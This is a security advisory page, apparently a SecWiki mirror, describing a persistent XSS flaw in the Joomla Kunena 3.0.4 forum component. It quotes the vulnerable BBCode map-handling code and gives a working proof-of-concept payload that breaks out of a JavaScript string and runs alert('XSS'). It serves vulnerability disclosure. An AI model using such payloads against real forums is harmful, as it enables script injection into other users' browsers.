Joomla Kunena Component 3.0.4 - Persistent XSS--SecWiki 精品漏洞

Joomla Kunena Component 3.0.4 - Persistent XSS
路人甲 2014-04-01 06:49:56

漏洞描述

			Persistent XSS in Joomla::Kunena 3.0.4
26. February 2014
by Qoppa
 
+++ Description
 
"Kunena is the leading Joomla forum component. Downloaded more than 3,750,000 times in nearly 6 years."
 
Kunena is written in PHP. Users can post a Google Map using the following BBCode
    [map]content[/map]
 
Kunena creates a JavaScript based on input, but doesn't decode it correctly.
 
 
+++ Analysis
 
Vulnerable function in \bbcode\bbcode.php (lines 1049-1116)
 
1049    function DoMap($bbcode, $action, $name, $default, $params, $content) {
    ...
1078    $document->addScriptDeclaration("
1079    // <![CDATA[
    ...
1097    var contentString = '<p><strong>".JText::_('COM_KUNENA_GOOGLE_MAP_NO_GEOCODE', true)." <i>".json_encode($content)."</i></strong></p>';
    ...
1112    // ]]>"
1113    );
 
Single quotes remain untouched in $content, so it's possible to break out of encapsulation.

测试代码

				[map]'}});}});alert('XSS');(function(){{(function(){{var v='[/map]

Joomla Kunena Component 3.0.4 - Persistent XSS

漏洞描述

测试代码

最新公告

友情链接

SecWiki公众号

安全学术圈